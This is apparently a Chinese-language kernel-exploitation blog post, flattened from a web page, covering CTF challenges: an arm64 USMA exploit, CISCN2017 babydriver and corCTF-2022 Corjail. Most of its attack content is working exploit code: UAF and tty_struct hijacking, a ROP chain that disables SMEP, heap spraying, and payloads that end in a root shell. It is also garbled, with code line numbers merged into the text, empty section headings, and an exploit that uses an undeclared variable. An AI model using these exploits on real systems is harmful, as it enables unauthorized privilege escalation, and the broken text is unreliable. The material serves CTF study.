exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <stddef.h> #include <stdint.h> #include <inttypes.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <sys/auxv.h> #include <sys/wait.h> #include <sys/sysinfo.h> #include <sys/param.h> #include <sys/socket.h> #include <sys/xattr.h> #include <arpa/inet.h> #include <net/if.h> #include <net/ethernet.h> #include <linux/if_packet.h> #include <pthread.h> #include <semaphore.h> #include <poll.h> #include <sched.h> #include <syscall.h> struct param { size_t len; size_t *buf; long long idx; }; void *(*prepare_kernel_cred)(void *) = (void *)0xFFFFFFC0000BEB60 ;void 
*(*commit_creds)(void *) = (void *)0xFFFFFFC0000BE5A0 ;void *(*set_memory_rw)(void * addr, int numpages) = (void *)0xFFFFFFC000095360 ;size_t SyS_setresuid_page_offset = 0xD50 ;size_t SyS_setresuid_page_base = 0xFFFFFFC0000B0C90 & ~0xFFF ;size_t init_cred = 0xFFFFFFC0008EA998 ;size_t ret_to_usr = 0xFFFFFFC000085554 ;size_t modprobe_path = 0xFFFFFFC0008E9A40 ;#define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_WRITE 8 #define BOF_READ 9 void alloc_buf (int fd, struct param* p) { printf ("[+] kmalloc len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_MALLOC, p); } void free_buf (int fd, struct param* p) { printf ("[+] kfree len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_FREE, p); } void read_buf (int fd, struct param* p) { printf ("[+] copy_to_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_READ, p); } void write_buf (int fd, struct param* p) { printf ("[+] copy_from_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_WRITE, p); } void get_shell () { char * flag = "/flag" ; char buffer[0x20 ] = {0 }; int fd = open(flag, O_RDWR); read(fd, buffer, 0x20 ); printf ("[*] flag: %s\n" , buffer); close(fd); exit (0 ); } size_t user_sp, user_pc;void save_status () { __asm__ volatile ( "mov %0, sp\n\t" : "=r" (user_sp) : : "memory" ) ; user_pc = (size_t )get_shell; printf ("[*] Saved SP: %p\n" , (void *)user_sp); } void get_root () { commit_creds(prepare_kernel_cred(0 )); __asm__ volatile ( "mov x0, #0x0\n" "mov x1, #0x3c0\n" "msr spsr_el1, x1\n" "msr sp_el0, %0\n" "msr elr_el1, %1\n" "eret\n" : : "r" (user_sp), "r" (user_pc) : "memory" ) ;} #define NONE "\033[m" #define RED "\033[0;32;31m" #define LIGHT_RED "\033[1;31m" #define GREEN "\033[0;32;32m" #define LIGHT_GREEN "\033[1;32m" #define BLUE "\033[0;32;34m" #define LIGHT_BLUE "\033[1;34m" #define DARY_GRAY "\033[1;30m" #define CYAN "\033[0;36m" #define LIGHT_CYAN "\033[1;36m" #define PURPLE "\033[0;35m" #define LIGHT_PURPLE "\033[1;35m" #define BROWN "\033[0;33m" #define YELLOW "\033[1;33m" #define 
LIGHT_GRAY "\033[0;37m" #define WHITE "\033[1;37m" void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf (BROWN "[*] %s:\n" NONE, desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } #define PACKET_RX_RING 5 #define PACKET_VERSION 10 #define PACKET_TX_RING 13 void packet_socket_rx_ring_init (int s, unsigned int block_size, unsigned int frame_size, unsigned int block_nr, unsigned int sizeof_priv, unsigned int timeout) { int v = TPACKET_V3; int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof (v)); if (rv < 0 ) { puts ("[X] setsockopt(PACKET_VERSION)" ); exit (-1 ); } struct tpacket_req3 req ; memset (&req, 0 , sizeof (req)); req.tp_block_size = block_size; req.tp_frame_size = frame_size; req.tp_block_nr = block_nr; req.tp_frame_nr = (block_size * block_nr) / frame_size; req.tp_retire_blk_tov = timeout; req.tp_sizeof_priv = sizeof_priv; req.tp_feature_req_word = 0 ; rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof (req)); if (rv < 0 ) { puts ("setsockopt(PACKET_RX_RING)" ); exit (-1 ); } } int packet_socket_setup (unsigned int block_size, unsigned int frame_size, unsigned int block_nr, unsigned int sizeof_priv, int timeout) { int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (s < 0 ) { puts ("socket(AF_PACKET)" ); exit (-1 ); } packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout); struct sockaddr_ll sa ; memset (&sa, 0 , sizeof (sa)); sa.sll_family = PF_PACKET; sa.sll_protocol = htons(ETH_P_ALL); sa.sll_ifindex = if_nametoindex("lo" ); sa.sll_hatype = 0 ; sa.sll_pkttype = 0 ; sa.sll_halen = 0 ; int rv = bind(s, (struct sockaddr *)&sa, 
sizeof (sa)); if (rv < 0 ) { puts ("bind(AF_PACKET)" ); exit (-1 ); } return s; } int alloc_pgv (int count, int size) { return packet_socket_setup(size, 2048 , count, 0 , 100 ); } void unshare_setup (void ) { char edit[0x100 ]; int tmp_fd; unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET); tmp_fd = open("/proc/self/setgroups" , O_WRONLY); write(tmp_fd, "deny" , strlen ("deny" )); printf ("[*] setgroups deny\n" ); close(tmp_fd); tmp_fd = open("/proc/self/uid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getuid()); write(tmp_fd, edit, strlen (edit)); printf ("[*] uid_map %s\n" , edit); close(tmp_fd); tmp_fd = open("/proc/self/gid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getgid()); write(tmp_fd, edit, strlen (edit)); printf ("[*] gid_map %s\n" , edit); close(tmp_fd); } void USMA () { int pipe_fd[2 ]; save_status(); pipe(pipe_fd); pid_t pid = fork(); if (pid == 0 ) { unshare_setup(); int bof_fd = open("/dev/bof" , O_RDWR); if (bof_fd < 0 ) { puts ("[-] Failed to open bof." 
); exit (-1 ); } struct param p = {0x200 , malloc (0x200 ), 0 }; memset (p.buf, 0 , 0x200 ); alloc_buf(bof_fd, &p); write_buf(bof_fd, &p); free_buf(bof_fd, &p); int packet_fd; packet_fd = alloc_pgv(0x200 /8 , 0x1000 ); read_buf(bof_fd, &p); qword_dump("leak 1" , p.buf, 0x200 ); for (size_t i = 0 ; i < 0x200 /8 ; i++) { p.buf[i] = SyS_setresuid_page_base; } write_buf(bof_fd, &p); read_buf(bof_fd, &p); qword_dump("leak 2" , p.buf, 0x200 ); char *page = mmap(NULL , 0x1000 * (0x200 / 8 ), PROT_READ | PROT_WRITE, MAP_SHARED, packet_fd, 0 ); if (page == MAP_FAILED) { perror("mmap" ); exit (-1 ); } qword_dump("page" , (page+SyS_setresuid_page_offset), (0x8 )); page[SyS_setresuid_page_offset + 0 ] = 0x26 ; page[SyS_setresuid_page_offset + 1 ] = 0x00 ; page[SyS_setresuid_page_offset + 2 ] = 0x00 ; page[SyS_setresuid_page_offset + 3 ] = 0x14 ; qword_dump("page" , (page+SyS_setresuid_page_offset), (0x8 )); write(pipe_fd[1 ], "E" , 1 ); pause(); } else if (pid > 0 ) { char buf[1 ]; read(pipe_fd[0 ], buf, 1 ); printf ("[*] start get root\n" ); if (setresuid(0 , 0 , 0 ) < 0 ) { perror("setresuid" ); exit (-1 ); } printf (GREEN "[+] Get root successfully!" NONE "\n" ); system("/bin/sh" ); } else { puts ("[-] fork() error" ); exit (-1 ); } return ; } int main () { USMA(); return 0 ; }
KSMA 利用思路 exp Ret2hbp 利用思路 exp Use After Cleanup 利用思路 exp Ret2VDSO 利用思路 VDSO是内核映射到用户空间的代码,利用内核的set_memory_rw设置vdso为可写权限,然后向vdso写入shellcode即可。可以用来绕过PAN/PXN保护。
exp Kernel Unlink 利用思路 exp CISCN2017 babydriver 题目分析 开了 smep 保护,没有 kaslr。
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet nokaslr' \ -enable-kvm \ -monitor /dev/null \ -m 64M \ --nographic \ -smp cores=1,threads=1 \ -cpu kvm64,+smep \ -s
模块中存在一个babydevice_t结构体:
1 2 3 4 struct babydevice_t { char *device_buf; size_t device_buf_len; }
babyioctl
将原先的 device_buf 释放,并分配一块新的内存。但这里有个很重要的点需要注意:该位置的 kmalloc 大小可以被用户任意指定。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 __int64 __fastcall babyioctl (file *filp, unsigned int command, unsigned __int64 arg) { size_t v3; size_t v4; _fentry__(filp, command); v4 = v3; if ( command == 0x10001 ) { kfree(babydev_struct.device_buf); babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0 LL); babydev_struct.device_buf_len = v4; printk("alloc done\n" ); return 0LL ; } else { printk("\x013defalut:arg is %ld\n" ); return -22LL ; } }
babyopen
申请的初始buf长度为0x40。
1 2 3 4 5 6 7 8 int __fastcall babyopen (inode *inode, file *filp) { _fentry__(inode, filp); babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6 ], 0x24000C0 LL, 64LL ); babydev_struct.device_buf_len = 64LL ; printk("device open\n" ); return 0 ; }
babywrite
ida 反汇编存在错误,这里需要修改一下copy_from_user的call type为void (__fastcall *)(char *, char *, size_t)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ssize_t __fastcall babywrite (file *filp, const char *buffer, size_t length, loff_t *offset) { size_t v4; ssize_t result; ssize_t v6; _fentry__(filp, buffer); if ( !babydev_struct.device_buf ) return -1LL ; result = -2LL ; if ( babydev_struct.device_buf_len > v4 ) { v6 = v4; ((void (__fastcall *)(char *, char *, size_t ))copy_from_user)(babydev_struct.device_buf, (char *)buffer, v4); return v6; } return result; }
babyread
修改一下copy_to_user的函数调用类型为void (__fastcall *)(char *, char *, size_t)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ssize_t __fastcall babyread (file *filp, char *buffer, size_t length, loff_t *offset) { size_t v4; ssize_t result; ssize_t v6; _fentry__(filp, buffer); if ( !babydev_struct.device_buf ) return -1LL ; result = -2LL ; if ( babydev_struct.device_buf_len > v4 ) { v6 = v4; ((void (__fastcall *)(char *, char *, size_t ))copy_to_user)(buffer, babydev_struct.device_buf, v4); return v6; } return result; }
babyrelease
没有重置len,也没有清空buf。
1 2 3 4 5 6 7 int __fastcall babyrelease (inode *inode, file *filp) { _fentry__(inode, filp); kfree(babydev_struct.device_buf); printk("device release\n" ); return 0 ; }
利用思路 执行完 babyrelease 函数之后,device_buf就会成为悬垂指针。但需要注意的是,在用户进程空间中,当执行close(fd)之后,该进程将无法再使用这个文件描述符,因此没有办法在close后再利用这个 fd 去进行写操作。
但我们可以利用 babydriver 中的变量全是全局变量的这个特性,同时执行两次 open 操作,获取两个 fd。这样即便一个 fd 被 close 了,我们仍然可以利用另一个 fd 来对 device_buf 进行写操作。
这道题虽然可以利用UAF提权,但这里我们主要练习一下tty_struct劫持,这道题的劫持相对来说是很简单的。
利用 UAF 劫持 tty_struct 的 ops 执行伪造的 fake_ops。
利用 fake_ops->ioctl 结合 cr4 寄存器关闭 smep,并完成栈迁移。
执行用户空间的提权代码。
这里需要注意的是:
mmap 的内存不应该恰好从 rax & 0xffffffff 开始:执行 rop 的过程中(例如跳到用户空间的 get_root 函数时),函数调用会继续向低地址方向使用栈,使 rsp 小于 rax & 0xffffffff,从而访问到未映射的内存造成越界。因此映射的起始地址需要再向低地址方向留出一段偏移。
1 2 3 4 5 6 7 char * fake_stack = mmap( (hijacked_stack_addr & (~0xffff ))-0x1000 , 0x30000 , PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1 , 0 );
mmap 的内存是没有映射到实际物理内存的虚拟内存,如果 rsp 到达没有写入 rop 的位置同样也会导致越界错误,因此在使用前先写入数据使其映射到物理内存上。
1 memset (fake_stack, 0 , 0x30000 );
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 #include <assert.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <unistd.h> #define xchg_eax_esp_addr 0xffffffff8100008a #define prepare_kernel_cred_addr 0xffffffff810a1810 #define commit_creds_addr 0xffffffff810a1420 #define pop_rdi_addr 0xffffffff810d238d #define mov_cr4_rdi_pop_rbp_addr 0xffffffff81004d80 #define swapgs_pop_rbp_addr 0xffffffff81063694 #define iretq_addr 0xffffffff814e35ef void get_root () { void * (*prepare_kernel_cred)(void *) = prepare_kernel_cred_addr; void (*commit_creds)(void *) = commit_creds_addr; commit_creds(prepare_kernel_cred(NULL )); } void get_shell () { system("/bin/sh" ); } unsigned long user_cs, user_rflags, user_rsp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_rsp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*]status has been saved." 
); } int main () { save_status(); int fd1 = open("/dev/babydev" , O_RDWR); int fd2 = open("/dev/babydev" , O_RDWR); ioctl(fd1, 65537 , 0x2e0 ); close(fd1); int master_fd = open("/dev/ptmx" , O_RDWR); size_t fake_tty_ops[] = { 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , xchg_eax_esp_addr }; size_t hijacked_stack_addr = ((size_t )xchg_eax_esp_addr & 0xffffffff ); char * fake_stack = mmap( (hijacked_stack_addr & (~0xffff ))-0x1000 , 0x30000 , PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1 , 0 ); memset (fake_stack, 0 , 0x30000 ); size_t rop_chain_mem[] = { pop_rdi_addr, 0x6f0 , mov_cr4_rdi_pop_rbp_addr, 0 , get_root, swapgs_pop_rbp_addr, 0 , iretq_addr, get_shell, user_cs, user_rflags, user_rsp, user_ss }; memcpy (hijacked_stack_addr, rop_chain_mem, sizeof (rop_chain_mem)); int ops_ptr_offset = 4 + 4 + 8 + 8 ; char overwrite_mem[ops_ptr_offset + 8 ]; char ** ops_ptr_addr = overwrite_mem + ops_ptr_offset; read(fd2, overwrite_mem, sizeof (overwrite_mem)); *ops_ptr_addr = &fake_tty_ops; write(fd2, overwrite_mem, sizeof (overwrite_mem)); ioctl(ptmx_fd, 0 , 0 ); return 0 ; }
corCTF-2022 Corjail 题目分析 我们可以使用 Guestfish 工具读取和修改 qcow2 文件。
run_challenge.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/sh qemu-system-x86_64 \ -m 1G \ -nographic \ -no-reboot \ -kernel bzImage \ -append "console=ttyS0 root=/dev/sda quiet loglevel=3 rd.systemd.show_status=auto rd.udev.log_level=3 oops=panic panic=-1 net.ifnames=0 pti=on" \ -hda coros.qcow2 \ -snapshot \ -monitor /dev/null \ -cpu qemu64,+smep,+smap,+rdrand \ -smp cores=4 \ --enable-kvm
init脚本
查看服务进程/etc/systemd/system/init.service;
1 2 3 4 5 6 7 8 Description=Initialize challenge [Service] Type=oneshot ExecStart=/usr/local/bin/init [Install] WantedBy=multi-user.target
查看 /usr/local/bin/init 脚本;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 cat /usr/local/bin/init USER=user FLAG=$(head -n 100 /dev/urandom | sha512sum | awk '{printf $1}' ) useradd --create-home --shell /bin/bash $USER echo "export PS1='\[\033[01;31m\]\u@CoROS\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]# '" >> /root/.bashrcecho "export PS1='\[\033[01;35m\]\u@CoROS\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '" >> /home/$USER /.bashrcchmod -r 0700 /home/$USER mv /root/temp /root/$FLAG chmod 0400 /root/$FLAG
password
1 2 3 4 5 6 7 8 9 10 11 ❯ guestfish --rw -a coros.qcow2 ><fs> run ><fs> list-filesystems /dev/sda: ext4 ><fs> mount /dev/sda / ><fs> cat /etc/password libguestfs: error: download: /etc/password: No such file or directory ><fs> cat /etc/passwd root:x:0:0:root:/root:/usr/local/bin/jail daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ......
root_shell
查看root用户的/usr/local/bin/jail;
1 2 3 4 5 6 7 8 9 10 11 12 13 ><fs> cat /usr/local/bin/jail echo -e '[\033[5m\e[1;33m!\e[0m] Spawning a shell in a CoRJail...' /usr/bin/docker run -it --user user \ --hostname CoRJail \ --security-opt seccomp=/etc/docker/corjail.json \ -v /proc/cormon:/proc_rw/cormon:rw corcontainer /bin/bash /usr/sbin/poweroff -f
可以发现 root 用户的登录 shell(/usr/local/bin/jail)启动后会先调用 docker 启动一个容器,容器退出后再执行 poweroff 关机;因此我们登录后拿到的 shell 实际上处于该 docker 容器当中。
为了方便调试,我们可以使用edit将其修改为:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ><fs> edit /usr/local/bin/jail ><fs> cat /usr/local/bin/jail echo -e '[\033[5m\e[1;33m!\e[0m] Spawning a shell in a CoRJail...' cp /exploit /home/user || echo "[!] exploit not found, skipping" chown -R user:user /home/userecho 0 > /proc/sys/kernel/kptr_restrict/usr/bin/docker run -it --user root \ --hostname CoRJail \ --security-opt seccomp=/etc/docker/corjail.json \ --cap-add CAP_SYSLOG \ -v /proc/cormon:/proc_rw/cormon:rw \ -v /home/user/:/home/user/host \ corcontainer /bin/bash /usr/sbin/poweroff -f
edit 的用法和 vim 一样。
后面我们上传 exp 的时候可以使用 upload 命令,其格式如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 ><fs> help upload NAME upload - upload a file from the local machine SYNOPSIS upload filename remotefilename DESCRIPTION Upload local file filename to remotefilename on the filesystem. filename can also be a named pipe. See also "download" .
kernel_patch
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 diff -ruN a/arch/x86/entry/syscall_64.c b/arch/x86/entry/syscall_64.c @@ -17,6 +17,9 @@ #define __SYSCALL_64(nr, sym) [nr] = __x64_##sym, +DEFINE_PER_CPU(u64 [NR_syscalls], __per_cpu_syscall_count); +EXPORT_PER_CPU_SYMBOL(__per_cpu_syscall_count); + asmlinkage const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = { /* * Smells like a compiler bug -- it doesn't work diff -ruN a/arch/x86/include/asm/syscall_wrapper.h b/arch/x86/include/asm/syscall_wrapper.h @@ -245,7 +245,7 @@ * SYSCALL_DEFINEx() -- which is essential for the COND_SYSCALL() and SYS_NI() * macros to work correctly. */ -#define SYSCALL_DEFINE0(sname) \ +#define __SYSCALL_DEFINE0(sname) \ SYSCALL_METADATA(_##sname, 0); \ static long __do_sys_##sname(const struct pt_regs *__unused); \ __X64_SYS_STUB0(sname) \ diff -ruN a/include/linux/syscalls.h b/include/linux/syscalls.h @@ -82,6 +82,7 @@ #include <linux/key.h> #include <linux/personality.h> #include <trace/syscall.h> +#include <asm/syscall.h> #ifdef CONFIG_ARCH_HAS_SYSCALL_WRAPPER /* @@ -202,8 +203,8 @@ } #endif -#ifndef SYSCALL_DEFINE0 -#define SYSCALL_DEFINE0(sname) \ +#ifndef __SYSCALL_DEFINE0 +#define __SYSCALL_DEFINE0(sname) \ SYSCALL_METADATA(_##sname, 0); \ asmlinkage long sys_##sname(void); \ ALLOW_ERROR_INJECTION(sys_##sname, ERRNO); \ @@ -219,9 +220,41 @@ #define SYSCALL_DEFINE_MAXARGS 6 -#define SYSCALL_DEFINEx(x, sname, ...) \ - SYSCALL_METADATA(sname, x, __VA_ARGS__) \ - __SYSCALL_DEFINEx(x, sname, __VA_ARGS__) +DECLARE_PER_CPU(u64[], __per_cpu_syscall_count); + +#define SYSCALL_COUNT_DECLAREx(sname, x, ...) 
\ + static inline long __count_sys##sname(__MAP(x, __SC_DECL, __VA_ARGS__)); + +#define __SYSCALL_COUNT(syscall_nr) \ + this_cpu_inc(__per_cpu_syscall_count[(syscall_nr)]) + +#define SYSCALL_COUNT_FUNCx(sname, x, ...) \ + { \ + __SYSCALL_COUNT(__syscall_meta_##sname.syscall_nr); \ + return __count_sys##sname(__MAP(x, __SC_CAST, __VA_ARGS__)); \ + } \ + static inline long __count_sys##sname(__MAP(x, __SC_DECL, __VA_ARGS__)) + +#define SYSCALL_COUNT_DECLARE0(sname) \ + static inline long __count_sys_##sname(void); + +#define SYSCALL_COUNT_FUNC0(sname) \ + { \ + __SYSCALL_COUNT(__syscall_meta__##sname.syscall_nr); \ + return __count_sys_##sname(); \ + } \ + static inline long __count_sys_##sname(void) + +#define SYSCALL_DEFINEx(x, sname, ...) \ + SYSCALL_METADATA(sname, x, __VA_ARGS__) \ + SYSCALL_COUNT_DECLAREx(sname, x, __VA_ARGS__) \ + __SYSCALL_DEFINEx(x, sname, __VA_ARGS__) \ + SYSCALL_COUNT_FUNCx(sname, x, __VA_ARGS__) + +#define SYSCALL_DEFINE0(sname) \ + SYSCALL_COUNT_DECLARE0(sname) \ + __SYSCALL_DEFINE0(sname) \ + SYSCALL_COUNT_FUNC0(sname) #define __PROTECT(...) asmlinkage_protect(__VA_ARGS__) diff -ruN a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c @@ -101,7 +101,7 @@ return NULL; } -static struct syscall_metadata *syscall_nr_to_meta(int nr) +struct syscall_metadata *syscall_nr_to_meta(int nr) { if (IS_ENABLED(CONFIG_HAVE_SPARSE_SYSCALL_NR)) return xa_load(&syscalls_metadata_sparse, (unsigned long)nr); @@ -111,6 +111,7 @@ return syscalls_metadata[nr]; } +EXPORT_SYMBOL(syscall_nr_to_meta); const char *get_syscall_name(int syscall) { @@ -122,6 +123,7 @@ return entry->name; } +EXPORT_SYMBOL(get_syscall_name); static enum print_line_t print_syscall_enter(struct trace_iterator *iter, int flags,
其中
1 +DEFINE_PER_CPU(u64 [NR_syscalls], __per_cpu_syscall_count);
为每个CPU都创建一个 __per_cpu_syscall_count 变量用来记录系统调用的次数。
seccomp.json 保存了系统调用的白名单。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 { "defaultAction" : "SCMP_ACT_ERRNO" , "defaultErrnoRet" : 1 , "syscalls" : [ { "names" : [ "_llseek" , "_newselect" , "accept" , "accept4" , "access" , ... ] , "action" : "SCMP_ACT_ALLOW" } , { "names" : [ "clone" ] , "action" : "SCMP_ACT_ALLOW" , "args" : [ { "index" : 0 , "value" : 2114060288 , "op" : "SCMP_CMP_MASKED_EQ" } ] } ] }
根据 README.md 的提示,可以在 /proc_rw/cormon 中查看被统计的系统调用在各个 CPU 上的调用次数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 root@CoRJail:/ CPU0 CPU1 CPU2 CPU3 Syscall (NR) 9 16 25 18 sys_poll (7) 0 0 0 0 sys_fork (57) 66 64 79 60 sys_execve (59) 0 0 0 0 sys_msgget (68) 0 0 0 0 sys_msgsnd (69) 0 0 0 0 sys_msgrcv (70) 0 0 0 0 sys_ptrace (101) 15 19 11 6 sys_setxattr (188) 27 24 11 20 sys_keyctl (250) 0 0 2 2 sys_unshare (272) 0 1 0 0 sys_execveat (322)
也可以指定系统调用。
1 2 3 4 5 6 7 root@CoRJail:/ root@CoRJail:/ CPU0 CPU1 CPU2 CPU3 Syscall (NR) 0 0 0 0 sys_msgsnd (69) 0 0 0 0 sys_msgrcv (70)
src.c
可以看到 write 存在明显的off-by-null。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 static ssize_t cormon_proc_write (struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) { loff_t offset = *ppos; char *syscalls; size_t len; if (offset < 0 ) return -EINVAL; if (offset >= PAGE_SIZE || !count) return 0 ; len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count; syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC); printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n" , (uint64_t )syscalls); if (!syscalls) { printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n" ); return -ENOMEM; } if (copy_from_user(syscalls, ubuf, len)) { printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n" ); return -EFAULT; } syscalls[len] = '\x00' ; if (update_filter(syscalls)) { kfree(syscalls); return -EINVAL; } kfree(syscalls); return count; }
利用思路 在 poll_list 利用方式中:
先通过 add_key() 堆喷大量 32 字节大小的 user_key_payload。
这里之所以选择 32 字节大小,是因为要与后面的 seq_operations 配合,并且 32 字节大小的 object 的地址低字节有可能为 \x00:其低字节只可能是 0x00、0x20、0x40、0x60、0x80、0xa0、0xc0、0xe0 之一。
然后创建 poll_list 链,其中 poll_list.next 指向的是一个 0x20 大小的 object。
触发 off by null,修改 poll_list.next 的低字节为 \x00,这里可能导致其指向某个 user_key_payload。
然后等待 timeout 后, 就会导致某个 user_key_payload 被释放,导致 UAF。
详细流程如下:
首先,我们要打开有漏洞的模块。 使用bind_core()将当前进程绑定到CPU0,因为我们是在一个多核环境中工作,而slab是按CPU分配的。
/*
 * Pin the calling process or thread to a single CPU.
 *
 * fixed:  true  -> always CPU 0;
 *         false -> a CPU picked by randint(1, get_nprocs()).
 * thread: true  -> set the affinity of the calling thread;
 *         false -> set the affinity of the whole process.
 *
 * With fewer than two CPUs there is no CPU other than 0 to pick, and
 * randint(1, 1) would reduce modulo zero, so CPU 0 is used in that case too.
 */
void bind_core(bool fixed, bool thread)
{
    cpu_set_t cpu_set;
    int cpu_count = get_nprocs();
    int target_cpu = (fixed || cpu_count < 2) ? 0 : randint(1, cpu_count);

    CPU_ZERO(&cpu_set);
    CPU_SET(target_cpu, &cpu_set);
    if (thread) {
        pthread_setaffinity_np(pthread_self(), sizeof(cpu_set), &cpu_set);
    } else {
        sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    }
}
喷射大量 0x20 大小的 user_key_payload 和下图所示 0x1000 + 0x20 的 poll_list 。
此时内存中 object 的分布如下图所示,其中黄色的是 user_key_payload ,绿色的是 poll_list ,白色是空闲 object 。
通过 off by null 修改 0x1000 大小的 poll_list ,使其原本指向 0x20 大小 poll_list 的 next 指针改为指向 user_key_payload 。之后释放所有的 poll_list 结构,被 next 指向的 user_key_payload 也随之被释放,形成 UAF 。
注意,为了确保释放 poll_list 不出错,要保证 0x20 大小的 poll_list 的 next 指针为 NULL 。也就是 user_key_payload 的前 8 字节为 NULL 。由于 user_key_payload 的前 8 字节没有初始化,因此可以在申请 user_key_payload 前先用 setxattr 把前 8 字节置为 NULL 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 static long setxattr (struct dentry *d, const char __user *name, const void __user *value, size_t size, int flags) { int error; void *kvalue = NULL ; char kname[XATTR_NAME_MAX + 1 ]; [...] if (size) { [...] kvalue = kvmalloc(size, GFP_KERNEL); if (!kvalue) return -ENOMEM; if (copy_from_user(kvalue, value, size)) { error = -EFAULT; goto out; } [...] } error = vfs_setxattr(d, kname, kvalue, size, flags); out: kvfree(kvalue); return error; }
